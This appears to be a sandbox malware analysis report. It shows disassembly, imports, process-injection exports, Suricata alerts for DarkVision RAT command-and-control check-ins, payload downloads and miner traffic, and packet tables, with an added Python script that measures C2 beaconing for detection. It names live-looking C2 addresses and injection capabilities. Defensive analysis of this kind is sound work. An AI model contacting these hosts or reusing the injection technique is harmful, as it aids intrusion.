                                                                          je 00007F73E0D9E0BEh
                                                                          mov eax, edx
                                                                          xor ebx, ebx
                                                                          shr edx, 02h
                                                                          je 00007F73E0D9E0AAh
                                                                          mov dword ptr [ecx], ebx
                                                                          lea ecx, dword ptr [ecx+04h]
                                                                          dec edx
                                                                          jne 00007F73E0D9E09Ah
                                                                          and eax, 03h
                                                                          je 00007F73E0D9E0A8h
                                                                          mov byte ptr [ecx], bl
                                                                          inc ecx
                                                                          dec eax
                                                                          jne 00007F73E0D9E09Ch
                                                                          pop ebx
                                                                          pop eax
                                                                          ret
                                                                          mov ebx, eax
                                                                          neg ebx
                                                                          add ebx, 10h
                                                                          sub edx, ebx
                                                                          xor eax, eax
                                                                          push edx
                                                                          mov edx, ebx
                                                                          and edx, 03h
                                                                          je 00007F73E0D9E0A8h
                                                                          mov byte ptr [ecx], al
                                                                          inc ecx
                                                                          dec edx
                                                                          jne 00007F73E0D9E09Ch
                                                                          shr ebx, 02h
                                                                          je 00007F73E0D9E0AAh
                                                                          mov dword ptr [ecx], eax
                                                                          lea ecx, dword ptr [ecx+04h]
                                                                          dec ebx
                                                                          jne 00007F73E0D9E09Ah
                                                                          pop edx
                                                                          jmp 00007F73E0D9DFFAh
                                                                          push 0000000Ah
                                                                          call dword ptr [00000000h]
                                                                          Programming Language:
                                                                          • [C++] VS2010 build 30319
                                                                          • [ASM] VS2010 SP1 build 40219
                                                                          • [ C ] VS2008 SP1 build 30729
                                                                          • [IMP] VS2008 SP1 build 30729
                                                                          • [C++] VS2010 SP1 build 40219
                                                                          • [ C ] VS2010 SP1 build 40219
                                                                          • [EXP] VS2010 SP1 build 40219
                                                                          • [RES] VS2010 SP1 build 40219
                                                                          • [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3b400 | 0x186 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3a8d4 | 0x64 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x80000 | 0x2f0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x81000 | 0x2fdc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x39cd0 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x32000 | 0x20c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x30fd9 | 0x31000 | 5278cc0f00bc7828a0b5c5174b9a6df0 | False | 0.46397680165816324 | data | 6.30267168485894 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x32000 | 0x9586 | 0x9600 | b90f48a1cd432420536571947f4afcd2 | False | 0.323828125 | data | 5.558651620039406 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3c000 | 0x434c0 | 0x3f200 | 9993e05992b14ea422c39af0b8b723f9 | False | 0.591224474009901 | data | 5.743039217047035 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x80000 | 0x2f0 | 0x400 | c4eb949748397a397333067900fa993b | False | 0.390625 | data | 4.267322939320033 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x81000 | 0x3df4 | 0x3e00 | 6b64b7bd321132acabd8b51798deda1c | False | 0.6132182459677419 | data | 5.879074642442366 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x80060 | 0x290 | XML 1.0 document, ASCII text, with CRLF line terminators | | | 0.5365853658536586
DLL | Imports
KERNEL32.dll | OpenMutexW, GetLastError, OpenEventW, Wow64DisableWow64FsRedirection, ExitProcess, lstrcpyA, lstrcpyW, GetModuleHandleW, LocalFree, lstrcmpiW, CreateThread, GetProcessHeap, IsWow64Process, GetCurrentProcess, GetProcAddress, VirtualFree, CloseHandle, WaitForSingleObject, ReadFile, GetFileSize, CreateFileW, FreeLibrary, LoadLibraryW, lstrlenW, InterlockedDecrement, GetSystemDirectoryW, GetWindowsDirectoryW, GetModuleFileNameW, LocalAlloc, DeleteFileW, WriteFile, CreateDirectoryW, Sleep, GetCommandLineW, LoadLibraryA, VirtualAlloc, RemoveDirectoryW, CreateEventW, SetEvent, ResumeThread, CreateMutexW, lstrlenA, WaitForMultipleObjects, ReleaseMutex, GetModuleHandleA, TerminateThread, GetExitCodeThread, GetNativeSystemInfo, FindClose, FindNextFileW, lstrcmpW, FindFirstFileW, VirtualProtect, GetTickCount, GetComputerNameExW, GetUserGeoID, GetCurrentProcessId, GetFileAttributesExW, HeapReAlloc, WriteConsoleW, SetStdHandle, GetStringTypeW, LCMapStringW, HeapSize, FlushFileBuffers, MultiByteToWideChar, LeaveCriticalSection, EnterCriticalSection, GetConsoleMode, GetConsoleCP, SetFilePointer, GetSystemTimeAsFileTime, QueryPerformanceCounter, DeleteCriticalSection, GetFileType, InitializeCriticalSectionAndSpinCount, RtlUnwind, RaiseException, HeapAlloc, HeapFree, GetCommandLineA, HeapSetInformation, GetStartupInfoW, IsProcessorFeaturePresent, DecodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, GetStdHandle, HeapCreate, GetModuleFileNameA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount
USER32.dll | wsprintfW, CreateWindowExW, GetForegroundWindow, SetWindowTextW, MessageBoxW, DefWindowProcW, RegisterClassW, GetMessageW, TranslateMessage, DispatchMessageW, DestroyWindow, UnregisterClassW, PostMessageW, wsprintfA
ole32.dll | CoCreateInstance
OLEAUT32.dll | VariantClear, VariantInit, SysFreeString, SysAllocString
Name | Ordinal | Address
GetModuleHandle64 | 1 | 0x405ac0
GetProcAddress64 | 2 | 0x406090
GetThreadContext64 | 3 | 0x406690
ReadProcessMemory64 | 4 | 0x4064b0
SetLastErrorFromX64Call | 5 | 0x406010
SetThreadContext64 | 6 | 0x406740
VirtualAllocEx64 | 7 | 0x406230
VirtualFreeEx64 | 8 | 0x406310
VirtualProtectEx64 | 9 | 0x406460
VirtualQueryEx64 | 10 | 0x406160
WriteProcessMemory64 | 11 | 0x4065a0
X64Call | 12 | 0x405750
Note: this export set (ordinals 1 to 12, ending in X64Call) is the public interface of the open-source wow64ext library, which lets a 32-bit process switch to 64-bit mode and call 64-bit ntdll to allocate, write and set thread context in 64-bit targets. It is consistent with the injection-related signatures listed for this sample (remote code injection, thread context modification, mapping memory into another process) and with the IsWow64Process / Wow64DisableWow64FsRedirection imports above.
                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                          2024-12-08T15:07:05.208895+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.649709185.157.162.2165200TCP
                                                                          2024-12-08T15:07:07.080523+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649708154.216.20.243443TCP
                                                                          2024-12-08T15:07:08.889565+01002045619ET MALWARE Win32/DarkVision RAT CnC Checkin M31192.168.2.649709185.157.162.2165200TCP
                                                                          2024-12-08T15:07:10.584306+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.649711185.157.162.2165200TCP
                                                                          2024-12-08T15:07:12.250453+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649707154.216.20.243443TCP
                                                                          2024-12-08T15:07:13.260349+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.649714185.157.162.2165200TCP
                                                                          2024-12-08T15:07:15.937042+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.649721185.157.162.2165200TCP
                                                                          2024-12-08T15:07:17.220795+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649712154.216.20.243443TCP
                                                                          2024-12-08T15:07:18.615476+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.649728185.157.162.2165200TCP
                                                                          2024-12-08T15:07:22.050459+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.649737185.157.162.2165200TCP
                                                                          2024-12-08T15:07:25.102418+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649738154.216.20.243443TCP
                                                                          2024-12-08T15:07:25.184321+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.649750185.157.162.2165200TCP
                                                                          2024-12-08T15:07:25.236284+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649715154.216.20.243443TCP
                                                                          2024-12-08T15:07:31.856449+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649756154.216.20.243443TCP
                                                                          2024-12-08T15:07:32.539004+01002022482ET MALWARE JS/Nemucod requesting EXE payload 2016-02-011192.168.2.649756154.216.20.243443TCP
                                                                          2024-12-08T15:07:32.823322+01002021954ET MALWARE JS/Nemucod.M.gen downloading EXE payload1154.216.20.243443192.168.2.649756TCP
                                                                          2024-12-08T15:07:33.500244+01002036289ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)2192.168.2.6641911.1.1.153UDP
                                                                          2024-12-08T15:07:37.726614+01002044697ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M31192.168.2.649774154.216.20.243443TCP
                                                                          2024-12-08T15:07:46.373548+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649775154.216.20.243443TCP
                                                                          2024-12-08T15:07:54.212031+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649804154.216.20.243443TCP
                                                                          2024-12-08T15:08:10.944741+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649823154.216.20.243443TCP
                                                                          2024-12-08T15:08:14.300884+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649857154.216.20.243443TCP
                                                                          2024-12-08T15:08:24.349906+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.649882185.157.162.2165200TCP
                                                                          2024-12-08T15:08:28.783097+01002045619ET MALWARE Win32/DarkVision RAT CnC Checkin M31192.168.2.649882185.157.162.2165200TCP
                                                                          2024-12-08T15:08:30.530981+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.649894185.157.162.2165200TCP
                                                                          2024-12-08T15:08:33.203418+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.649903185.157.162.2165200TCP
                                                                          2024-12-08T15:08:35.870874+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.649909185.157.162.2165200TCP
                                                                          2024-12-08T15:08:38.982183+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.649916185.157.162.2165200TCP
                                                                          2024-12-08T15:08:41.654103+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.649922185.157.162.2165200TCP
                                                                          2024-12-08T15:08:44.324382+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.649930185.157.162.2165200TCP
2024-12-08T15:09:47.046507+0100 | 2051004 | ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request | 2 | 192.168.2.6 | 50012 | 154.216.20.243 | 443 | TCP
2024-12-08T15:09:48.823823+0100 | 2045618 | ET MALWARE Win32/DarkVision RAT CnC Checkin M1 | 1 | 192.168.2.6 | 50014 | 185.157.162.216 | 5200 | TCP
2024-12-08T15:09:53.265747+0100 | 2045619 | ET MALWARE Win32/DarkVision RAT CnC Checkin M3 | 1 | 192.168.2.6 | 50014 | 185.157.162.216 | 5200 | TCP
2024-12-08T15:09:55.147311+0100 | 2045618 | ET MALWARE Win32/DarkVision RAT CnC Checkin M1 | 1 | 192.168.2.6 | 50015 | 185.157.162.216 | 5200 | TCP
2024-12-08T15:09:57.816864+0100 | 2045618 | ET MALWARE Win32/DarkVision RAT CnC Checkin M1 | 1 | 192.168.2.6 | 50016 | 185.157.162.216 | 5200 | TCP
2024-12-08T15:10:00.934674+0100 | 2045618 | ET MALWARE Win32/DarkVision RAT CnC Checkin M1 | 1 | 192.168.2.6 | 50017 | 185.157.162.216 | 5200 | TCP
2024-12-08T15:10:03.604087+0100 | 2045618 | ET MALWARE Win32/DarkVision RAT CnC Checkin M1 | 1 | 192.168.2.6 | 50018 | 185.157.162.216 | 5200 | TCP
2024-12-08T15:10:06.279386+0100 | 2045618 | ET MALWARE Win32/DarkVision RAT CnC Checkin M1 | 1 | 192.168.2.6 | 50019 | 185.157.162.216 | 5200 | TCP
2024-12-08T15:10:08.950916+0100 | 2045618 | ET MALWARE Win32/DarkVision RAT CnC Checkin M1 | 1 | 192.168.2.6 | 50020 | 185.157.162.216 | 5200 | TCP
2024-12-08T15:10:42.374133+0100 | 2051004 | ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request | 2 | 192.168.2.6 | 50021 | 154.216.20.243 | 443 | TCP
2024-12-08T15:11:13.508924+0100 | 2045618 | ET MALWARE Win32/DarkVision RAT CnC Checkin M1 | 1 | 192.168.2.6 | 50023 | 185.157.162.216 | 5200 | TCP
2024-12-08T15:11:17.202658+0100 | 2045619 | ET MALWARE Win32/DarkVision RAT CnC Checkin M3 | 1 | 192.168.2.6 | 50023 | 185.157.162.216 | 5200 | TCP
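The per-packet TCP table that follows is exported with its columns run together (timestamp, source port, destination port, source IP and destination IP fused into one string), which makes it hard to pivot on. The Python below is an added example, not part of the Joe Sandbox report or of any Joe Sandbox tooling. It un-fuses such rows by anchoring on two facts visible in the report: the sandbox VM is 192.168.2.6, and the sandbox side of every connection uses a Windows dynamic port (49152 and up). It then groups packets into connections and measures the gap between successive new connections to the DarkVision C2 at 185.157.162.216:5200, the beaconing cadence a detection can key on. The embedded rows are a constructed subset copied from the table; the simplification that the remote address is never a prefix or suffix of the sandbox address is an assumption that holds for this report.

```python
"""Un-fuse Joe Sandbox's flattened TCP packet rows and group them into flows.

Added example, not part of the Joe Sandbox report or its tooling. Rows in
PACKETS_RAW are copied from this report's packet table as the text export
fuses them. Assumption: the remote IP is never a prefix/suffix of SANDBOX_IP.
"""
import re
from datetime import datetime
from statistics import median
from typing import NamedTuple

SANDBOX_IP = "192.168.2.6"   # local side of every flow in the report
EPHEMERAL_MIN = 49152        # start of the Windows dynamic port range

# Constructed subset of rows, copied verbatim from the report's packet table.
PACKETS_RAW = """\
Dec 8, 2024 15:07:02.806296110 CET49708443192.168.2.6154.216.20.243
Dec 8, 2024 15:07:02.806344032 CET44349708154.216.20.243192.168.2.6
Dec 8, 2024 15:07:05.087150097 CET497095200192.168.2.6185.157.162.216
Dec 8, 2024 15:07:05.206758022 CET520049709185.157.162.216192.168.2.6
Dec 8, 2024 15:07:10.462671995 CET497115200192.168.2.6185.157.162.216
Dec 8, 2024 15:07:13.140523911 CET497145200192.168.2.6185.157.162.216
Dec 8, 2024 15:07:15.815959930 CET497215200192.168.2.6185.157.162.216
Dec 8, 2024 15:07:18.495564938 CET497285200192.168.2.6185.157.162.216
Dec 8, 2024 15:07:21.930888891 CET497375200192.168.2.6185.157.162.216
Dec 8, 2024 15:07:25.064681053 CET497505200192.168.2.6185.157.162.216
"""

OCTET = r"(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)"
IPV4_RE = re.compile(rf"{OCTET}(?:\.{OCTET}){{3}}")


class Packet(NamedTuple):
    ts: datetime
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int


def split_ports(digits: str, local_is_src: bool) -> list[tuple[int, int]]:
    """All splits of a fused 'srcport dstport' digit run into two valid ports
    whose sandbox-side port is ephemeral (the only reliable anchor)."""
    out = []
    for i in range(1, len(digits)):
        a, b = digits[:i], digits[i:]
        if any(x != "0" and x.startswith("0") for x in (a, b)):
            continue  # a fused numeric field never carries a leading zero
        sp, dp = int(a), int(b)
        if 0 < sp <= 65535 and 0 < dp <= 65535:
            if (sp if local_is_src else dp) >= EPHEMERAL_MIN:
                out.append((sp, dp))
    return out


def parse_ts(ts: str) -> datetime:
    """'Dec 8, 2024 15:07:02.806296110' -> datetime (ns truncated to us)."""
    head, frac = ts.rsplit(".", 1)
    return datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def parse_row(line: str, local_ip: str = SANDBOX_IP) -> Packet:
    """Un-fuse one exported row; raise if the split is not unique."""
    ts_str, _, tail = line.strip().rpartition(" CET")
    ts = parse_ts(ts_str)
    found = []
    if tail.endswith(local_ip):                  # remote -> sandbox
        body = tail[: -len(local_ip)]            # ports + remote IP
        head, rest = body.split(".", 1)          # head = ports + first octet
        for k in (1, 2, 3):                      # try 1-3 digit first octets
            ports, remote = head[:-k], f"{head[-k:]}.{rest}"
            if ports and IPV4_RE.fullmatch(remote):
                for sp, dp in split_ports(ports, local_is_src=False):
                    found.append(Packet(ts, remote, sp, local_ip, dp))
    else:                                        # sandbox -> remote
        i = tail.find(local_ip)
        ports, remote = tail[:i], tail[i + len(local_ip):]
        if i > 0 and ports.isdigit() and IPV4_RE.fullmatch(remote):
            for sp, dp in split_ports(ports, local_is_src=True):
                found.append(Packet(ts, local_ip, sp, remote, dp))
    if len(found) != 1:
        raise ValueError(f"cannot un-fuse {line!r}: {found}")
    return found[0]


def parse_rows(text: str) -> list[Packet]:
    return [parse_row(l) for l in text.splitlines() if l.strip()]


def flows(packets):
    """Group packets into connections keyed by (sandbox port, remote IP, remote port)."""
    out = {}
    for p in packets:
        key = ((p.src_port, p.dst_ip, p.dst_port) if p.src_ip == SANDBOX_IP
               else (p.dst_port, p.src_ip, p.src_port))
        f = out.setdefault(key, {"first": p.ts, "last": p.ts, "packets": 0})
        f["first"], f["last"] = min(f["first"], p.ts), max(f["last"], p.ts)
        f["packets"] += 1
    return out


def beacon_intervals(fl, remote_ip: str, remote_port: int) -> list[float]:
    """Seconds between successive new connections to one remote endpoint."""
    starts = sorted(f["first"] for (_, rip, rp), f in fl.items()
                    if (rip, rp) == (remote_ip, remote_port))
    return [(b - a).total_seconds() for a, b in zip(starts, starts[1:])]


if __name__ == "__main__":
    fl = flows(parse_rows(PACKETS_RAW))
    for (lp, rip, rp), f in sorted(fl.items(), key=lambda kv: kv[1]["first"]):
        print(f"{f['first']:%H:%M:%S.%f} {SANDBOX_IP}:{lp} -> {rip}:{rp} "
              f"packets={f['packets']}")
    gaps = beacon_intervals(fl, "185.157.162.216", 5200)
    print("new DarkVision connections every ~%.1fs (median)" % median(gaps))
```

On the embedded subset the median gap between new connections to 185.157.162.216:5200 comes out just under 3 s, and the Suricata "DarkVision RAT CnC Checkin M1" alerts above fire on successive source ports at the same roughly 2.7 s spacing, so a short, regular interval to a non-standard port is the behaviour to alert on rather than any single IP.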
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 8, 2024 15:07:02.806296110 CET | 49708 | 443 | 192.168.2.6 | 154.216.20.243
Dec 8, 2024 15:07:02.806344032 CET | 443 | 49708 | 154.216.20.243 | 192.168.2.6
Dec 8, 2024 15:07:02.806416035 CET | 49708 | 443 | 192.168.2.6 | 154.216.20.243
Dec 8, 2024 15:07:02.832381964 CET | 49708 | 443 | 192.168.2.6 | 154.216.20.243
Dec 8, 2024 15:07:02.832406044 CET | 443 | 49708 | 154.216.20.243 | 192.168.2.6
Dec 8, 2024 15:07:02.839137077 CET | 49707 | 443 | 192.168.2.6 | 154.216.20.243
Dec 8, 2024 15:07:02.839169979 CET | 443 | 49707 | 154.216.20.243 | 192.168.2.6
Dec 8, 2024 15:07:02.839230061 CET | 49707 | 443 | 192.168.2.6 | 154.216.20.243
Dec 8, 2024 15:07:02.867506027 CET | 49707 | 443 | 192.168.2.6 | 154.216.20.243
Dec 8, 2024 15:07:02.867537022 CET | 443 | 49707 | 154.216.20.243 | 192.168.2.6
Dec 8, 2024 15:07:05.087150097 CET | 49709 | 5200 | 192.168.2.6 | 185.157.162.216
Dec 8, 2024 15:07:05.206758022 CET | 5200 | 49709 | 185.157.162.216 | 192.168.2.6
Dec 8, 2024 15:07:05.207581997 CET | 49709 | 5200 | 192.168.2.6 | 185.157.162.216
Dec 8, 2024 15:07:05.208894968 CET | 49709 | 5200 | 192.168.2.6 | 185.157.162.216
Dec 8, 2024 15:07:05.328515053 CET | 5200 | 49709 | 185.157.162.216 | 192.168.2.6
Dec 8, 2024 15:07:07.060173988 CET | 5200 | 49709 | 185.157.162.216 | 192.168.2.6
Dec 8, 2024 15:07:07.060342073 CET | 49709 | 5200 | 192.168.2.6 | 185.157.162.216
Dec 8, 2024 15:07:07.080523014 CET | 49708 | 443 | 192.168.2.6 | 154.216.20.243
Dec 8, 2024 15:07:07.123337030 CET | 443 | 49708 | 154.216.20.243 | 192.168.2.6
Dec 8, 2024 15:07:07.180042028 CET | 5200 | 49709 | 185.157.162.216 | 192.168.2.6
Dec 8, 2024 15:07:07.757277012 CET | 5200 | 49709 | 185.157.162.216 | 192.168.2.6
Dec 8, 2024 15:07:07.757443905 CET | 49709 | 5200 | 192.168.2.6 | 185.157.162.216
Dec 8, 2024 15:07:07.876899004 CET | 5200 | 49709 | 185.157.162.216 | 192.168.2.6
Dec 8, 2024 15:07:07.877003908 CET | 49709 | 5200 | 192.168.2.6 | 185.157.162.216
Dec 8, 2024 15:07:07.997724056 CET | 5200 | 49709 | 185.157.162.216 | 192.168.2.6
Dec 8, 2024 15:07:08.889313936 CET | 5200 | 49709 | 185.157.162.216 | 192.168.2.6
Dec 8, 2024 15:07:08.889564991 CET | 49709 | 5200 | 192.168.2.6 | 185.157.162.216
Dec 8, 2024 15:07:09.011099100 CET | 5200 | 49709 | 185.157.162.216 | 192.168.2.6
Dec 8, 2024 15:07:09.011161089 CET | 49709 | 5200 | 192.168.2.6 | 185.157.162.216
Dec 8, 2024 15:07:09.130723000 CET | 5200 | 49709 | 185.157.162.216 | 192.168.2.6
Dec 8, 2024 15:07:10.029928923 CET | 5200 | 49709 | 185.157.162.216 | 192.168.2.6
Dec 8, 2024 15:07:10.079848051 CET | 49709 | 5200 | 192.168.2.6 | 185.157.162.216
Dec 8, 2024 15:07:10.460792065 CET | 5200 | 49709 | 185.157.162.216 | 192.168.2.6
Dec 8, 2024 15:07:10.462671995 CET | 49711 | 5200 | 192.168.2.6 | 185.157.162.216
Dec 8, 2024 15:07:10.501657009 CET | 49709 | 5200 | 192.168.2.6 | 185.157.162.216
Dec 8, 2024 15:07:10.583864927 CET | 5200 | 49711 | 185.157.162.216 | 192.168.2.6
Dec 8, 2024 15:07:10.584064960 CET | 49711 | 5200 | 192.168.2.6 | 185.157.162.216
Dec 8, 2024 15:07:10.584306002 CET | 49711 | 5200 | 192.168.2.6 | 185.157.162.216
Dec 8, 2024 15:07:10.704195976 CET | 5200 | 49711 | 185.157.162.216 | 192.168.2.6
Dec 8, 2024 15:07:10.901562929 CET | 5200 | 49709 | 185.157.162.216 | 192.168.2.6
Dec 8, 2024 15:07:10.954780102 CET | 49709 | 5200 | 192.168.2.6 | 185.157.162.216
Dec 8, 2024 15:07:11.689960003 CET | 5200 | 49709 | 185.157.162.216 | 192.168.2.6
Dec 8, 2024 15:07:11.736031055 CET | 49709 | 5200 | 192.168.2.6 | 185.157.162.216
Dec 8, 2024 15:07:12.250452995 CET | 49707 | 443 | 192.168.2.6 | 154.216.20.243
Dec 8, 2024 15:07:12.291347027 CET | 443 | 49707 | 154.216.20.243 | 192.168.2.6
Dec 8, 2024 15:07:12.298985958 CET | 49712 | 443 | 192.168.2.6 | 154.216.20.243
Dec 8, 2024 15:07:12.299026012 CET | 443 | 49712 | 154.216.20.243 | 192.168.2.6
Dec 8, 2024 15:07:12.299101114 CET | 49712 | 443 | 192.168.2.6 | 154.216.20.243
Dec 8, 2024 15:07:12.301244974 CET | 49712 | 443 | 192.168.2.6 | 154.216.20.243
Dec 8, 2024 15:07:12.301258087 CET | 443 | 49712 | 154.216.20.243 | 192.168.2.6
Dec 8, 2024 15:07:12.441374063 CET | 5200 | 49711 | 185.157.162.216 | 192.168.2.6
Dec 8, 2024 15:07:12.441530943 CET | 49711 | 5200 | 192.168.2.6 | 185.157.162.216
Dec 8, 2024 15:07:12.561295033 CET | 5200 | 49711 | 185.157.162.216 | 192.168.2.6
Dec 8, 2024 15:07:12.701493979 CET | 5200 | 49709 | 185.157.162.216 | 192.168.2.6
Dec 8, 2024 15:07:12.751694918 CET | 49709 | 5200 | 192.168.2.6 | 185.157.162.216
Dec 8, 2024 15:07:13.140050888 CET | 5200 | 49711 | 185.157.162.216 | 192.168.2.6
Dec 8, 2024 15:07:13.140523911 CET | 49714 | 5200 | 192.168.2.6 | 185.157.162.216
Dec 8, 2024 15:07:13.189181089 CET | 49711 | 5200 | 192.168.2.6 | 185.157.162.216
Dec 8, 2024 15:07:13.259958029 CET | 5200 | 49714 | 185.157.162.216 | 192.168.2.6
Dec 8, 2024 15:07:13.260096073 CET | 49714 | 5200 | 192.168.2.6 | 185.157.162.216
Dec 8, 2024 15:07:13.260349035 CET | 49714 | 5200 | 192.168.2.6 | 185.157.162.216
Dec 8, 2024 15:07:13.382699966 CET | 5200 | 49714 | 185.157.162.216 | 192.168.2.6
Dec 8, 2024 15:07:13.717324018 CET | 5200 | 49709 | 185.157.162.216 | 192.168.2.6
Dec 8, 2024 15:07:13.767321110 CET | 49709 | 5200 | 192.168.2.6 | 185.157.162.216
Dec 8, 2024 15:07:14.409110069 CET | 443 | 49708 | 154.216.20.243 | 192.168.2.6
Dec 8, 2024 15:07:14.409215927 CET | 49708 | 443 | 192.168.2.6 | 154.216.20.243
Dec 8, 2024 15:07:14.409215927 CET | 49708 | 443 | 192.168.2.6 | 154.216.20.243
Dec 8, 2024 15:07:14.730331898 CET | 5200 | 49709 | 185.157.162.216 | 192.168.2.6
Dec 8, 2024 15:07:14.782934904 CET | 49709 | 5200 | 192.168.2.6 | 185.157.162.216
Dec 8, 2024 15:07:15.117863894 CET | 5200 | 49714 | 185.157.162.216 | 192.168.2.6
Dec 8, 2024 15:07:15.118024111 CET | 49714 | 5200 | 192.168.2.6 | 185.157.162.216
Dec 8, 2024 15:07:15.223218918 CET | 49715 | 443 | 192.168.2.6 | 154.216.20.243
Dec 8, 2024 15:07:15.223268986 CET | 443 | 49715 | 154.216.20.243 | 192.168.2.6
Dec 8, 2024 15:07:15.223367929 CET | 49715 | 443 | 192.168.2.6 | 154.216.20.243
Dec 8, 2024 15:07:15.223716021 CET | 49715 | 443 | 192.168.2.6 | 154.216.20.243
Dec 8, 2024 15:07:15.223728895 CET | 443 | 49715 | 154.216.20.243 | 192.168.2.6
Dec 8, 2024 15:07:15.237307072 CET | 5200 | 49714 | 185.157.162.216 | 192.168.2.6
Dec 8, 2024 15:07:15.793869019 CET | 5200 | 49709 | 185.157.162.216 | 192.168.2.6
Dec 8, 2024 15:07:15.815588951 CET | 5200 | 49714 | 185.157.162.216 | 192.168.2.6
Dec 8, 2024 15:07:15.815959930 CET | 49721 | 5200 | 192.168.2.6 | 185.157.162.216
Dec 8, 2024 15:07:15.845499039 CET | 49709 | 5200 | 192.168.2.6 | 185.157.162.216
Dec 8, 2024 15:07:15.861084938 CET | 49714 | 5200 | 192.168.2.6 | 185.157.162.216
Dec 8, 2024 15:07:15.936781883 CET | 5200 | 49721 | 185.157.162.216 | 192.168.2.6
Dec 8, 2024 15:07:15.936866999 CET | 49721 | 5200 | 192.168.2.6 | 185.157.162.216
Dec 8, 2024 15:07:15.937041998 CET | 49721 | 5200 | 192.168.2.6 | 185.157.162.216
Dec 8, 2024 15:07:16.056726933 CET | 5200 | 49721 | 185.157.162.216 | 192.168.2.6
Dec 8, 2024 15:07:16.799125910 CET | 5200 | 49709 | 185.157.162.216 | 192.168.2.6
Dec 8, 2024 15:07:16.845422983 CET | 49709 | 5200 | 192.168.2.6 | 185.157.162.216
Dec 8, 2024 15:07:17.220794916 CET | 49712 | 443 | 192.168.2.6 | 154.216.20.243
Dec 8, 2024 15:07:17.267332077 CET | 443 | 49712 | 154.216.20.243 | 192.168.2.6
Dec 8, 2024 15:07:17.788969994 CET | 5200 | 49721 | 185.157.162.216 | 192.168.2.6
Dec 8, 2024 15:07:17.795542002 CET | 49721 | 5200 | 192.168.2.6 | 185.157.162.216
Dec 8, 2024 15:07:17.812360048 CET | 5200 | 49709 | 185.157.162.216 | 192.168.2.6
Dec 8, 2024 15:07:17.861061096 CET | 49709 | 5200 | 192.168.2.6 | 185.157.162.216
